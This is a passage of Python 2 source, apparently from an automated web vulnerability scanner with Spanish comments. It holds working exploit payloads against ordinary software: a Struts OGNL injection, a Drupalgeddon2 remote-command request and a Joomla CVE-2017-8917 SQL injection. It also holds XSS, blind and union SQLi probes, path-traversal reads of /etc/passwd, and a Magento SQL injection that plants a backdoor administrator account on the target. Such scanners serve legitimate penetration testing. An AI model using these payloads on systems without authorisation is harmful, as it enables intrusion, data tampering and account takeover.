147 | 		#?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%22truerandom%22%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
148 | 		payload = ("?%72%65%64%69%72%65%63%74%3a%24%7b%23%72%65%71%3d"
149 | 		"%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27%63%6f%6d%2e%6f%70"
150 | 		"%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69"
151 | 		"%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74"
152 | 		"%52%65%71%75%65%73%74%27%29%2c%23%61%3d%23%72%65%71%2e%67%65"
153 | 		"%74%53%65%73%73%69%6f%6e%28%29%2c%23%62%3d%23%61%2e%67%65%74"
154 | 		"%53%65%72%76%6c%65%74%43%6f%6e%74%65%78%74%28%29%2c%23%63%3d"
155 | 		"%23%62%2e%67%65%74%52%65%61%6c%50%61%74%68%28%22%2f%22%29%2c"
156 | 		"%23%6d%61%74%74%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27"
157 | 		"%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f"
158 | 		"%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53"
159 | 		"%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%27%29%2c%23%6d%61"
160 | 		"%74%74%2e%67%65%74%57%72%69%74%65%72%28%29%2e%70%72%69%6e%74"
161 | 		"%6c%6e%28%22%74%72%75%65%72%61%6e%64%6f%6d%22%2e%74%6f%55%70"
162 | 		"%70%65%72%43%61%73%65%28%29%29%2c%23%6d%61%74%74%2e%67%65%74"
163 | 		"%57%72%69%74%65%72%28%29%2e%66%6c%75%73%68%28%29%2c%23%6d%61"
164 | 		"%74%74%2e%67%65%74%57%72%69%74%65%72%28%29%2e%63%6c%6f%73%65%28%29%7d"
165 | 		)
166 | 		tocheck = 'TRUERANDOM'
167 | 		fullurl = dirurl+payload
168 | 		print 'testing %s' % fullurl
169 | 		try:
170 | 			response = self.req.getHTMLCode(fullurl)
171 | 			if tocheck in response.text:
172 | 				#self.detections.append("[ "+fullurl+" ] ====== "+cve)
173 | 				self.detections.append("[ "+fullurl+" ] ====== VULNERABLE TO: "+cve+" =====")
174 | 				return True
175 | 			return False
176 | 		except Exception as e:
177 | 			print 'struts excepcion cachada '+str(e)
178 | 			return False
179 | 			
180 | class drupalscan(vulndetector):
181 | 	def __init__(self,req,blacklist,color=False):
182 | 		#print 'Entre a drupalscan vuln'
183 | 		self.name = 'drupal'
184 | 		self.color = color
185 | 		self.req = req
186 | 		self.blacklist = blacklist
187 | 		self.cmsroot = None
188 | 		self.toolflags = []
189 | 		self.headers = []
190 | 		self.filelist = ['']
191 | 		self.wordpatterns = ['']
192 | 		self.defaultdirs = ['']
193 | 		self.defaultfiles = ['']
194 | 		self.dicdefdirs = {}
195 | 		self.toolpath = None
196 | 		self.standalone = False
197 | 		self.postcrawl = True
198 | 		self.detections = []
199 | 		self.toolargs = []
200 | 		self.resources = []
201 | 		self.output = None
202 | 		# Puntuacion de este scanner
203 | 		self.puntuation = 0	
204 | 		self.standalone = False
205 | 		self.cmsroot = None
206 | 
207 | 	# Busca vulnerabilidades especificas, a partir de la raiz
208 | 	def launchExploitsF(self):
209 | 		#Aqui debo probar para cada recurso encontrado alguna vulne asociada
210 | 		# resources to test on
211 | 		#print 'debug: entre a launch exploitF'
212 | 		#print 'cmsroot ',self.cmsroot
213 | 		if self.cmsroot is not None:
214 | 			#print 'probando xmlrpc en %s cmsroot es %s' % (self.name,self.cmsroot)
215 | 			self.launchXMLRPC()
216 | 			self.launchDrupalgeddon2()
217 | 		
218 | 	def launchXMLRPC(self):
219 | 		cve = 'xmlrpc'
220 | 		dirurl = self.cmsroot+'xmlrpc.php'
221 | 		#print 'debug dirurl',dirurl
222 | 		#print 'trying xmlrpc'
223 | 		#print ' dirurl ',dirurl
224 | 		tocheck = 'XML-RPC'
225 | 		try:
226 | 			response = self.req.getHTMLCode(dirurl)
227 | 			if response is not None and tocheck in response.text:
228 | 				print '*'*30,'\nVulnerable to %s\n' % cve,'*'*30
229 | 				self.detections.append("[ "+dirurl+" ] ====== VULNERABLE TO: "+cve+" ========")
230 | 				return True
231 | 			return False
232 | 		except Exception as e:
233 | 			return False
234 | 
235 | 	def launchDrupalgeddon2(self):
236 | 		if self.cmsroot is None: return False
237 | 		cve = 'drupalgeddon2'
238 | 		tocheck = 'MTMzNw=='
239 | 		dirurl = self.cmsroot
240 | 		get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'echo base64_encode(1337)', 'name[#type]':'markup'}
241 | 		post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
242 | 		# s es el objeto session de el objeto req
243 | 		try:
244 | 			response = self.req.s.post(self.cmsroot, data=post_params, params=get_params,timeout=4,verify=False)
245 | 			if response is not None and tocheck in response.text:
246 | 				#print response.text
247 | 				self.detections.append("[ "+dirurl+" ] ====== VULNERABLE TO: "+cve+" ======\n")
248 | 				print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)
249 | 				return True
250 | 			return False
251 | 		except Exception as e:
252 | 			print e
253 | 			return False
254 | 			
255 | class wordpresscan(vulndetector):
256 | 	def __init__(self,req,blacklist,color=False):
257 | 		self.name = 'wordpress'
258 | 		self.color = color
259 | 		self.req = req
260 | 		self.blacklist = blacklist
261 | 		self.cmsroot = None
262 | 		self.toolflags = []
263 | 		self.headers = []
264 | 		self.filelist = ['']
265 | 		self.wordpatterns = ['']
266 | 		self.defaultdirs = ['']
267 | 		self.defaultfiles = ['']
268 | 		self.dicdefdirs = {}
269 | 		self.toolpath = None
270 | 		self.standalone = False
271 | 		self.postcrawl = True
272 | 		self.detections = []
273 | 		self.toolargs = []
274 | 		self.resources = []
275 | 		self.output = None
276 | 		# Puntuacion de este scanner
277 | 		self.puntuation = 0	
278 | 		self.standalone = False
279 | 		self.cmsroot = None
280 | 
281 | 	def launchExploitsF(self):
282 | 		# resources to test on
283 | 		if self.cmsroot is not None:
284 | 			self.launchXMLRPC()
285 | 			self.SimpleSocialButtons()
286 | 			
287 | 	def launchXMLRPC(self):
288 | 		#print 'WORDPRESS VULN trying xmlrpc'
289 | 		cve = 'xmlrpc methods exposed'
290 | 		datos = """
291 | 		<?xml version="1.0"?>
292 | 		<methodCall><methodName>system.listMethods</methodName>
293 | 			<params><param></param></params>
294 | 		</methodCall>
295 | 		"""
296 | 		fullurl = self.cmsroot+'xmlrpc.php'
297 | 		#print "fullurl ",fullurl
298 | 		try:
299 | 			response = self.req.s.post(fullurl,data=datos)
300 | 		except Exception as e:
301 | 			print e
302 | 			return False
303 | 		tocheck = '<string>system.multicall</string>'
304 | 		try:
305 | 			if tocheck in response.text:
306 | 				#print 'es vulnerable ',fullurl
307 | 				
308 | 				#print '*'*30,'\nVulnerable to %s\n' % cve,'*'*30
309 | 				print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)
310 | 				print response.text
311 | 				self.detections.append("[ "+fullurl+" ] ====== VULNERABLE TO: "+cve+" ===========" + response.text)
312 | 				return True
313 | 			return False
314 | 		except Exception as e:
315 | 			print 'excepcion cachada '+str(e)
316 | 			return False
317 | 
318 | 	def SimpleSocialButtons(self):
319 | 			#print 'WORDPRESS VULN trying xmlrpc'
320 | 			cve = 'Simple Social Buttons'
321 | 			fullurl = self.cmsroot+'/wp-content/plugins/simple-social-buttons/readme.txt'
322 | 			#print "fullurl ",fullurl
323 | 			try:
324 | 				response = self.req.s.get(fullurl)
325 | 			except Exception as e:
326 | 				print e
327 | 				return False
328 | 			tocheck = 'Simple Social Media Share Buttons'
329 | 			try:
330 | 				if tocheck in response.text:
331 | 					#print 'es vulnerable ',fullurl
332 | 					
333 | 					#print '*'*30,'\nVulnerable to %s\n' % cve,'*'*30
334 | 					print '*'*(len(cve)+15),'\nPossible vulnerable to %s\n' % cve,'*'*(len(cve)+15)
335 | 					print response.text
336 | 					self.detections.append("[ "+fullurl+" ] ====== VULNERABLE TO: "+cve+" ===========")
337 | 					return True
338 | 				return False
339 | 			except Exception as e:
340 | 				print 'excepcion cachada '+str(e)
341 | 				return False
342 | 			
343 | class joomlascan(vulndetector):
344 | 	def __init__(self,req,blacklist,color=False):
345 | 		self.name = 'joomla'
346 | 		self.color = color
347 | 		self.req = req
348 | 		self.blacklist = blacklist
349 | 		self.cmsroot = None
350 | 		self.toolflags = []
351 | 		self.headers = []
352 | 		self.filelist = ['']
353 | 		self.wordpatterns = ['']
354 | 		self.defaultdirs = ['']
355 | 		self.defaultfiles = ['']
356 | 		self.dicdefdirs = {}
357 | 		self.toolpath = None
358 | 		self.standalone = False
359 | 		self.postcrawl = True
360 | 		self.detections = []
361 | 		self.toolargs = []
362 | 		self.resources = []
363 | 		self.output = None
364 | 		# Puntuacion de este scanner
365 | 		self.puntuation = 0	
366 | 		self.standalone = False
367 | 		self.cmsroot = None
368 | 
369 | 	def launchExploitsF(self):
370 | 		# resources to test on
371 | 		if self.cmsroot is not None:
372 | 			self.launchCVE_2017_8917()
373 | 		
374 | 	def launchCVE_2017_8917(self):
375 | 		#print 'DRUPAL VULN trying xmlrpc'
376 | 		cve = 'Joomla com_fields SQL Injection (CVE-2017-8917)'
377 | 		fullurl = self.cmsroot+'/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,truerandomtruerandom),1)'
378 | 		#print "fullurl ",fullurl
379 | 		tocheck = 'truerandomtruerandom'
380 | 		try:
381 | 			response = self.req.getHTMLCode(fullurl)
382 | 			if tocheck in response.text:
383 | 				print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)
384 | 				res = ''
385 | 				try:
386 | 					m = re.search('Unknown column .*',response.text)
387 | 					if m: res = m.group(0)
388 | 				except Exception as e:
389 | 					pass
390 | 				self.detections.append("[ "+fullurl+" ] ====== VULNERABLE TO: "+cve+" =========="+res)
391 | 				return True
392 | 			return False
393 | 		except Exception as e:
394 | 			print 'excepcion cachada '+str(e)
395 | 			return False
396 | 
397 | class moodlescan(vulndetector):
398 | 	def __init__(self,req,blacklist,color=False):
399 | 		self.name = 'moodle'
400 | 		self.color = color
401 | 		self.req = req
402 | 		self.blacklist = blacklist
403 | 		self.cmsroot = None
404 | 		self.toolflags = []
405 | 		self.headers = []
406 | 		self.filelist = ['']
407 | 		self.wordpatterns = ['']
408 | 		self.defaultdirs = ['']
409 | 		self.defaultfiles = ['']
410 | 		self.dicdefdirs = {}
411 | 		self.toolpath = None
412 | 		self.standalone = False
413 | 		self.postcrawl = True
414 | 		self.detections = []
415 | 		self.toolargs = []
416 | 		self.resources = []
417 | 		self.output = None
418 | 		# Puntuacion de este scanner
419 | 		self.puntuation = 0	
420 | 		self.standalone = False
421 | 		self.cmsroot = None
422 | 
423 | 	def launchExploitsF(self):
424 | 		# resources to test on
425 | 		if self.cmsroot is not None:
426 | 			self.launchXSS_PHPCOVERAGE()
427 | 		
428 | 	def launchXSS_PHPCOVERAGE(self):
429 | 		#print 'DRUPAL VULN trying xmlrpc'
430 | 		cve = 'PHPCOVERAGE_HOME Cross Site Scripting'
431 | 		fullurl = self.cmsroot+'/lib/spikephpcoverage/src/phpcoverage.remote.top.inc.php?PHPCOVERAGE_HOME=%3Cscript%3Ealert(%22truerandom%22)%3C/script%3E'
432 | 		#print "fullurl ",fullurl
433 | 		tocheck = '<script>alert("truerandom")</script>'
434 | 		try:
435 | 			response = self.req.getHTMLCode(fullurl)
436 | 			if tocheck in response.text:
437 | 				print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)
438 | 				self.detections.append("[ "+fullurl+" ] ====== VULNERABLE TO: "+cve+" =====")
439 | 				return True
440 | 			return False
441 | 		except Exception as e:
442 | 			print 'excepcion cachada '+str(e)
443 | 			return False
444 | 			
445 | class magentoscan(vulndetector):
446 | 	def __init__(self,req,blacklist,color=False):
447 | 		self.name = 'magento'
448 | 		self.color = color
449 | 		self.req = req
450 | 		self.blacklist = blacklist
451 | 		self.cmsroot = None
452 | 		self.toolflags = []
453 | 		self.headers = []
454 | 		self.filelist = ['']
455 | 		self.wordpatterns = ['']
456 | 		self.defaultdirs = ['']
457 | 		self.defaultfiles = ['']
458 | 		self.dicdefdirs = {}
459 | 		self.toolpath = None
460 | 		self.standalone = False
461 | 		self.postcrawl = True
462 | 		self.detections = []
463 | 		self.toolargs = []
464 | 		self.resources = []
465 | 		self.output = None
466 | 		# Puntuacion de este scanner
467 | 		self.puntuation = 0	
468 | 		self.standalone = False
469 | 		self.cmsroot = None
470 | 
471 | 	def launchExploitsF(self):
472 | 		# resources to test on
473 | 		if self.cmsroot is not None:
474 | 			self.accountCreation()
475 | 			
476 | 	def accountCreation(self):
477 | 		print 'accountCreation'
478 | 		SQLQUERY="""
479 | 		SET @SALT = 'rp';
480 | 		SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
481 | 		SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
482 | 		INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
483 | 		INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
484 | 		"""
485 | 		# Put the nice readable queries into one line,
486 | 		# and insert the username:password combinination
487 | 		query = SQLQUERY.replace("\n", "").format(username="truerandom", password="truerandomtruerandom")
488 | 		pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
489 | 		cve = 'Admin Account creation'
490 | 		fullurl = self.cmsroot+'index.php/admin/Cms_Wysiwyg/directive/index/'
491 | 		#print "fullurl ",fullurl
492 | 		r = self.req.s.post(fullurl,data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ","filter": base64.b64encode(pfilter),"forwarded": 1})
493 | 		try:
494 | 			if r.ok:
495 | 				print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)
496 | 				self.detections.append("[ "+fullurl+" ] ====== VULNERABLE TO: "+cve + "  ==== Login as admin with truerandom:truerandomtruerandom")
497 | 				return True
498 | 			return False
499 | 		except Exception as e:
500 | 			print 'exception '+str(e)
501 | 			return False
502 | 			
503 | class xssscan(vulndetector):
504 | 	def __init__(self,req,blacklist,color=False):
505 | 		self.name = 'xssscan'
506 | 		self.color = color
507 | 		self.req = req
508 | 		self.blacklist = blacklist
509 | 		self.cmsroot = None
510 | 		self.toolflags = []
511 | 		self.headers = []
512 | 		self.filelist = ['']
513 | 		self.wordpatterns = ['']
514 | 		self.defaultdirs = ['']
515 | 		self.defaultfiles = ['']
516 | 		self.dicdefdirs = {}
517 | 		self.toolpath = None
518 | 		self.standalone = False
519 | 		self.postcrawl = True
520 | 		self.detections = []
521 | 		self.toolargs = []
522 | 		self.resources = []
523 | 		self.output = None
524 | 		# Puntuacion de este scanner
525 | 		self.puntuation = 0	
526 | 		self.standalone = True
527 | 		self.cmsroot = None
528 | 		self.already_tested = {} 
529 | 		
530 | 	def launchExploitFilename(self,dirurl):
531 | 		if parseurls.get_extension(dirurl) not in self.blacklist:
532 | 			if self.testXSS(dirurl):
533 | 				print "VULNERABLE TO XSS: ",dirurl
534 | 	
535 | 	def testXSS(self,dirurl):
536 | 		#print('DEBUG: xss: already tested: ')
537 | 		#print(self.already_tested)
538 | 		#print('DEBUG: xss: testing %s' % dirurl)
539 | 		#print('DEBUG : xssscan : testXSS', dirurl)
540 | 		cve = 'XSSVULN'	
541 | 		payload = ("")
542 | 		tocheck = '<script>alert(/TRUERANDOM/)</script>'
543 | 		injection_points= parseurls.get_injection_points(dirurl)
544 | 		#print(type(injection_points))
545 | 		if injection_points is None: return
546 | 		#print('injection_points is not none')
547 | 		for injection_point in injection_points:
548 | 			url_resource,url_to_inject,var_name = injection_point
549 | 			#print('url_resource: %s ' % url_resource)
550 | 			#print('url_to_inject: %s ' % url_to_inject)
551 | 			#print('var_name: %s ' % var_name)
552 | 			# la base_url
553 | 			if url_resource not in self.already_tested:
554 | 				self.already_tested[url_resource] = []
555 | 			#if var_name not in self.already_tested[url_resource]: print('DEBUG:xssscan@testXSS : [i] trying to : %s' % url_to_inject)
556 | 			# TODO: add data structure
557 | 			#print('DEBUG : xssscan : testXSS ',injection_point)
558 | 				full_url = url_to_inject.replace('{TO_REPLACE}',tocheck)
559 | 				#print('DEBUG:xssscan@testXSS : [i] payload : %s' % full_url)
560 | 				try:
561 | 					res = self.req.getHTMLCode(full_url)
562 | 				except Exception as e:
563 | 					print('problem at vuln_detection %s' % full_url)
564 | 				if res is not None and res.text is not None:
565 | 					if tocheck in res.text:
566 | 						print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)
567 | 						toappend = "[ "+url_to_inject+" ] ====== VULNERABLE TO: "+cve+" ====="
568 | 						if toappend not in self.detections:
569 | 							self.already_tested[url_resource].append(var_name)
570 | 							self.detections.append(cgi.escape(full_url))
571 | 							print('full_url es: %s' % full_url)
572 | 							return True
573 | 				self.already_tested[url_resource].append(var_name)
574 | 		return False					
575 | 					
576 | class sqliscan(vulndetector):
577 | 	def __init__(self,req,blacklist,color=False):
578 | 		self.name = 'sqliscan'
579 | 		self.color = color
580 | 		self.req = req
581 | 		self.blacklist = blacklist
582 | 		self.cmsroot = None
583 | 		self.toolflags = []
584 | 		self.headers = []
585 | 		self.filelist = ['']
586 | 		self.wordpatterns = ['']
587 | 		self.defaultdirs = ['']
588 | 		self.defaultfiles = ['']
589 | 		self.dicdefdirs = {}
590 | 		self.toolpath = None
591 | 		self.standalone = False
592 | 		self.postcrawl = True
593 | 		self.detections = []
594 | 		self.toolargs = []
595 | 		self.resources = []
596 | 		self.output = None
597 | 		# Puntuacion de este scanner
598 | 		self.puntuation = 0	
599 | 		self.standalone = True
600 | 		self.cmsroot = None
601 | 		self.pat = re.compile('ERROR|MYSQL|SYNTAX',re.IGNORECASE)
602 | 		# Diccionarios
603 | 		# recurso: variable
604 | 		# Si la variable ya existe con la llave recurso entonces skip
605 | 		# Sino verifico y pruebo
606 | 		self.already_tested_error_sqli = {}
607 | 		self.already_tested_blind_sqli = {}
608 | 		self.already_tested_union_sqli = {}
609 | 		
610 | 	def launchExploitFilename(self,dirurl):
611 | 		if parseurls.get_extension(dirurl) not in self.blacklist:
612 | 			if self.testSQLi(dirurl):
613 | 				print "VULNERABLE TO SQLi: ",dirurl
614 | 		
615 | 	def testSQLi(self,dirurl):
616 | 		self.error_based_sqli(dirurl)
617 | 		self.blind_sqli(dirurl)
618 | 		self.union_sqli(dirurl)
619 | 	
620 | 	"""
621 | 	self.already_tested_error_sqli = 
622 | 	{
623 | 		'base_url1' = [var1_tested,var2_tested,...,varn_tested]
624 | 		'base_url2' = [var1_tested,var2_tested,...,varn_tested]
625 | 	}
626 | 	if 'base_url' not in dicc: dicc['base_url'] = []
627 | 	if var_name not in dicc['base_url']: analize
628 | 	"""
629 | 	def error_based_sqli(self,dirurl):
630 | 		"""
631 | 		print('DEBUG: error_based_sqli: already tested: ')
632 | 		print(self.already_tested_error_sqli)
633 | 		print('DEBUG: error_based_sqli: testing %s' % dirurl)
634 | 		"""
635 | 		cve = 'SQLi (Error Based)'
636 | 		payload = "'"
637 | 		injection_points = parseurls.get_injection_points(dirurl)
638 | 		if injection_points is None: return 
639 | 		orig_url = dirurl
640 | 		sql_keywords = ["error","mysql","syntax","manual","server"] # TODO: add pgsql|mssql... keywords
641 | 		sql_payloads = ["1","1'","a'","a'-"]
642 | 		# injection_point = (url_recurso,url?var_to_inject=placeholder&var2=val...&varn=valn)
643 | 		for injection_point in injection_points:
644 | 			# url_resource = dom/resource
645 | 			url_resource,url_to_inject,var_name = injection_point
646 | 			#print('url_resource: %s ' % url_resource)
647 | 			#print('url_to_inject: %s ' % url_to_inject)
648 | 			#print('var_name: %s ' % var_name)
649 | 			# la base_url
650 | 			if url_resource not in self.already_tested_error_sqli:
651 | 				self.already_tested_error_sqli[url_resource] = []
652 | 			if var_name not in self.already_tested_error_sqli[url_resource]:
653 | 				#print('DEBUG:sqliscan@errorbased : [i] trying to inject: %s' % url_to_inject)
654 | 				for sql_p in sql_payloads:
655 | 					mod_url = url_to_inject.replace("{TO_REPLACE}",sql_p)
656 | 					words_not_in_orig_req = self.req.word_not_in_response(sql_keywords,orig_url)
657 | 					words_not_in_mod_req = self.req.word_not_in_response(sql_keywords,mod_url)
658 | 					if words_not_in_orig_req != words_not_in_mod_req:
659 | 						print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)
660 | 						toappend = "[ "+url_to_inject+" ] ====== VULNERABLE TO: "+cve+" ====="
661 | 						if toappend not in self.detections:
662 | 							self.detections.append(toappend)
663 | 							self.already_tested_error_sqli[url_resource].append(var_name)
664 | 						return True
665 | 				self.already_tested_error_sqli[url_resource].append(var_name)
666 | 		"""
667 | 		for injection_point in injection_points:
668 | 			if injection_point not in self.already_tested_error_sqli:
669 | 				for sql_p in sql_payloads:
670 | 					mod_url = injection_point.replace("{TO_REPLACE}",sql_p)
671 | 					words_not_in_orig_req = self.req.word_not_in_response(sql_keywords,orig_url)
672 | 					words_not_in_mod_req = self.req.word_not_in_response(sql_keywords,mod_url)
673 | 					if words_not_in_orig_req != words_not_in_mod_req:
674 | 						print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)
675 | 						toappend = "[ "+injection_point+" ] ====== VULNERABLE TO: "+cve+" ====="
676 | 						if toappend not in self.detections:
677 | 							self.detections.append(toappend)
678 | 						return True
679 | 				self.already_tested_error_sqli.append(injection_point)
680 | 		"""
681 | 		return False	
682 | 	
683 | 	"""
684 | 	self.already_tested_blind_sqli = 
685 | 	{
686 | 		'base_url1' = [var1_tested,var2_tested,...,varn_tested]
687 | 		'base_url2' = [var1_tested,var2_tested,...,varn_tested]
688 | 	}
689 | 	if 'base_url' not in dicc: dicc['base_url'] = []
690 | 	if var_name not in dicc['base_url']: analize
691 | 	"""	
692 | 	def blind_sqli(self,dirurl):
693 | 		"""
694 | 		print('DEBUG: blind_based_sqli: already tested: ')
695 | 		print(self.already_tested_blind_sqli)
696 | 		print('DEBUG: blind_based_sqli: testing %s' % dirurl)
697 | 		"""
698 | 		cve = 'SQLi (Blind Based)'
699 | 		payload = "'"
700 | 		injection_points = parseurls.get_injection_points(dirurl)
701 | 		if injection_points is None: return 
702 | 		# true_cases,false_cases = [(AND TRUE,AND FALSO)]
703 | 		# if resp[orig_url] == resp[true_cases and resp[orig_url] != resp[false_case]
704 | 		blind_cases  = [
705 | 			("1","1 AND 2=2","1 AND 2=3"),
706 | 			("1","1 AND 2>1","1 AND 2>3"),
707 | 			("1","1 AND 2=2 -- -v","1 AND 2=3 -- -v"),
708 | 			("1","1 AND 2>1 -- -v","1 AND 2>3 -- -v"),
709 | 			("a","a' AND '1'='1","a' AND '1'='2"),
710 | 			("a","a' AND '2'='2","a' AND '2'='3"),
711 | 			("a","a' AND '2'='2' -- -v","a' AND '2'='3' -- -v"),
712 | 			("a","a' AND '2'>'1' -- -v","a' AND '2'>'3' -- -v")
713 | 		]
714 | 		for injection_point in injection_points:
715 | 			url_resource,url_to_inject,var_name = injection_point
716 | 			if url_resource not in self.already_tested_blind_sqli:
717 | 				self.already_tested_blind_sqli[url_resource] = []
718 | 			if var_name not in self.already_tested_blind_sqli[url_resource]:
719 | 				#print('DEBUG:sqliscan@blindbased :\n[i] trying to inject: %s' % url_to_inject)
720 | 				for sql_p in blind_cases:
721 | 					base_case,true_case,false_case = sql_p
722 | 					
723 | 					base_url = url_to_inject.replace("{TO_REPLACE}",base_case)
724 | 					true_url = url_to_inject.replace("{TO_REPLACE}",true_case)
725 | 					false_url = url_to_inject.replace("{TO_REPLACE}",false_case)
726 | 					"""
727 | 					print('\nDEBUG:sqliscan@blindbased[BaseCase]:\n%s' % base_url)
728 | 					print('DEBUG:sqliscan@blindbased[TrueCase]:\n%s' % true_url) 
729 | 					print('DEBUG:sqliscan@blindbased[FalseCase]:\n%s' % false_url) 
730 | 					"""
731 | 					try:
732 | 						base_r = self.req.getHTMLCode(base_url)
733 | 						true_r = self.req.getHTMLCode(true_url)
734 | 						false_r = self.req.getHTMLCode(false_url)
735 | 					except Exception as e: pass
736 | 					
737 | 					if (true_r is not None and true_r.text is not None and
738 | 						false_r is not None and false_r.text is not None and
739 | 						base_r is not None and base_r.text is not None):
740 | 						if true_r.text == base_r.text and true_r.text != false_r.text:
741 | 							print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)
742 | 							toappend = "[ "+url_to_inject+" ] ====== VULNERABLE TO: "+cve+" ====="
743 | 							if toappend not in self.detections:
744 | 								self.detections.append(toappend)
745 | 						self.already_tested_blind_sqli[url_resource].append(var_name)
746 | 						return True
747 | 				self.already_tested_blind_sqli[url_resource].append(var_name)
748 | 		return False	
749 | 		
750 | 	def union_sqli(self,dirurl):
751 | 		"""
752 | 		print('DEBUG: union_based_sqli: already tested: ')
753 | 		print(self.already_tested_union_sqli)
754 | 		print('DEBUG: union_based_sqli: testing %s' % dirurl)
755 | 		"""
756 | 		cve = 'SQLi (UNION BASED)'
757 | 		payload = "'"
758 | 		injection_points = parseurls.get_injection_points(dirurl)
759 | 		if injection_points is None: return 
760 | 		union_cases  = [
761 | 			("1","1 ORDER BY 1","1 ORDER BY 10000"),
762 | 			("1'","1' ORDER BY 1 -- -v","1' ORDER BY 10000 -- -v"),
763 | 			("a'","a' ORDER BY 1 -- -v","a' ORDER BY 10000 -- -v")
764 | 		]
765 | 		for injection_point in injection_points:
766 | 			url_resource,url_to_inject,var_name = injection_point
767 | 			if url_resource not in self.already_tested_union_sqli:
768 | 				self.already_tested_union_sqli[url_resource] = []
769 | 			if var_name not in self.already_tested_union_sqli[url_resource]:
770 | 				#print('DEBUG:sqliscan@unionbased :\n[i] trying to inject: %s' % url_to_inject)
771 | 				for sql_p in union_cases:
772 | 					base_case,true_case,false_case = sql_p
773 | 					
774 | 					base_url = url_to_inject.replace("{TO_REPLACE}",base_case)
775 | 					true_url = url_to_inject.replace("{TO_REPLACE}",true_case)
776 | 					false_url = url_to_inject.replace("{TO_REPLACE}",false_case)
777 | 					"""
778 | 					print('\nDEBUG:sqliscan@unionbased[BaseCase]:\n%s' % base_url)
779 | 					print('DEBUG:sqliscan@blindbased[ValidCase]:\n%s' % true_url) 
780 | 					print('DEBUG:sqliscan@blindbased[InvalidCase]:\n%s' % false_url) 
781 | 					"""
782 | 					try:
783 | 						base_r = self.req.getHTMLCode(base_url)
784 | 						true_r = self.req.getHTMLCode(true_url)
785 | 						false_r = self.req.getHTMLCode(false_url)
786 | 					except Exception as e: pass
787 | 					
788 | 					if (true_r is not None and true_r.text is not None and
789 | 						false_r is not None and false_r.text is not None and
790 | 						base_r is not None and base_r.text is not None):
791 | 						if true_r.text == base_r.text and true_r.text != false_r.text:
792 | 							print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)
793 | 							toappend = "[ "+url_to_inject+" ] ====== VULNERABLE TO: "+cve+" ====="
794 | 							if toappend not in self.detections:
795 | 								self.detections.append(toappend)
796 | 						self.already_tested_union_sqli[url_resource].append(var_name)
797 | 						return True
798 | 				self.already_tested_union_sqli[url_resource].append(var_name)
799 | 		return False
800 | 
801 | class path_traversal_scan(vulndetector):
802 | 	def __init__(self,req,blacklist,color=False):
803 | 		self.name = 'path_traversal_scan'
804 | 		self.color = color
805 | 		self.req = req
806 | 		self.blacklist = blacklist
807 | 		self.cmsroot = None
808 | 		self.toolflags = []
809 | 		self.headers = []
810 | 		self.filelist = ['']
811 | 		self.wordpatterns = ['']
812 | 		self.defaultdirs = ['']
813 | 		self.defaultfiles = ['']
814 | 		self.dicdefdirs = {}
815 | 		self.toolpath = None
816 | 		self.standalone = False
817 | 		self.postcrawl = True
818 | 		self.detections = []
819 | 		self.toolargs = []
820 | 		self.resources = []
821 | 		#self.output = None
822 | 		# Puntuacion de este scanner
823 | 		self.puntuation = 0	
824 | 		self.standalone = True
825 | 		self.cmsroot = None
826 | 		# preffix file suffix
827 | 		self.path_files = {
828 | 			'/etc/passwd':'root:x:0:0:root:/root:',
829 | 			'/etc/group':'root:x:0:',
830 | 			'C:/Windows/system.ini':'; for 16-bit app support',
831 | 			'C:/Windows/win.ini':'; for 16-bit app support'
832 | 		}
833 | 		self.preffixes = ['','../../../../../',
834 | 			"..\\..\\..\\..\\..\\",
835 | 			"..\/,..\/,..\/..\/,..\/",
836 | 			"%2e%2e%2f%2e%2e%2f"
837 | 		]
838 | 		self.suffixes = ['','%00']
839 | 		self.already_tested = {}
840 | 		
841 | 	def launchExploitFilename(self,dirurl):
